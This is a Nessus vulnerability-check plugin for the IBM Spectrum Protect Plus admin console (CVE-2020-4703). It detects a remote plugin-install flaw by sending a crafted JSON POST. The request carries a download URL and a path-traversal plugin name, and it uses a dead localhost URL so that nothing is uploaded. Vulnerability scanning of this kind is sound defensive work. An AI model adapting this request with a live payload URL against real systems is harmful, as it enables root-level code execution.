IBM Spectrum Protect Plus File Upload RCE

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(141471);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/16");

  script_cve_id("CVE-2020-4703");
  script_xref(name:"TRA", value:"TRA-2020-54");

  script_name(english:"IBM Spectrum Protect Plus File Upload RCE");

  script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus (SPP) administrative console running
on the remote host is affected by a remote code execution
vulnerability due to the fact that it allows remote installation of
console plugins. An unauthenticated, remote attacker can exploit
this and CVE-2020-4711 together, via specially crafted HTTP requests, 
to execute arbitrary code on the system with root privileges.

Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
  script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/6328867");
  script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-adminconsole to
10.1.6-27 or later. That spp-adminconsole package should be in the IBM
Spectrum Protect Plus 10.1.6 build 2045.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"PoC demonstrates unauthenticated RCE as root.");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/09/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/09/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ibm_spp_admin_console_detect.nbin");
  script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
  script_require_ports("Services/www", 8090);

  exit(0);
}

include('http.inc');
include('webapp_func.inc');

app = 'IBM Spectrum Protect Plus Administrative Console';

# Exit if app is not detected on the host.
get_install_count(app_name:app, exit_if_zero:TRUE);

# Exit if app is not detected on this http port.
port = get_http_port(default:8090, ignore_broken:TRUE);
get_single_install(app_name:app, port:port);

url = '/api/plugin/?action=install_single';

# Use a dead download URL so that no file will be uploaded to the
# remote host.
filename = 'no_such_file_' + rand_str(length:8);
download_url = 'http://localhost:12345/' + filename;
data = '{' +
  '"url": "' + download_url + '",' +  # Where to download the file
  '"filename": "' + filename + '",' + # File name to be saved as
  '"type": "FILE",' +                 # Install type
  # pluginName folder to save the downloaded file
  #
  # /opt/adminconsole/plugins/<pluginName>/<filename> will be created
  # if <filename> is downloaded successfully from <url>.
  '"pluginName": "emi/../../../../../tmp"' +
'}';

# Response may be delayed as the vulnerable server tries to download
# a file from a dead URL link.
if (http_get_read_timeout() < 20)
  http_set_read_timeout(20);

res = http_send_recv3(
  port            : port,
  method          : 'POST',
  item            : url,
  data            : data,
  content_type    : 'application/json',
  exit_on_fail    : TRUE
);

# Patched server removed POST support to /api/plugin.
# It returns a '501 Not Implemented'.
if(' 501 ' >< res[0])
  audit(AUDIT_LISTEN_NOT_VULN, app, port);
#
# Vulnerable server processes the request and returns 200.
# No file was uploaded to the remote host because a dead download
# URL was used, and installation of <pluginName> failed.
else if(' 200 ' >< res[0])
{
  extra = 'Nessus was able to detect the issue by sending the' +
    ' following HTTP request to the remote host : ' +
    '\n' +
    '\n' +
    http_last_sent_request();

  security_report_v4(
    port       : port,
    severity   : SECURITY_HOLE,
    extra      : extra 
  );
}
# Unexpected response status
else
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(res[0]));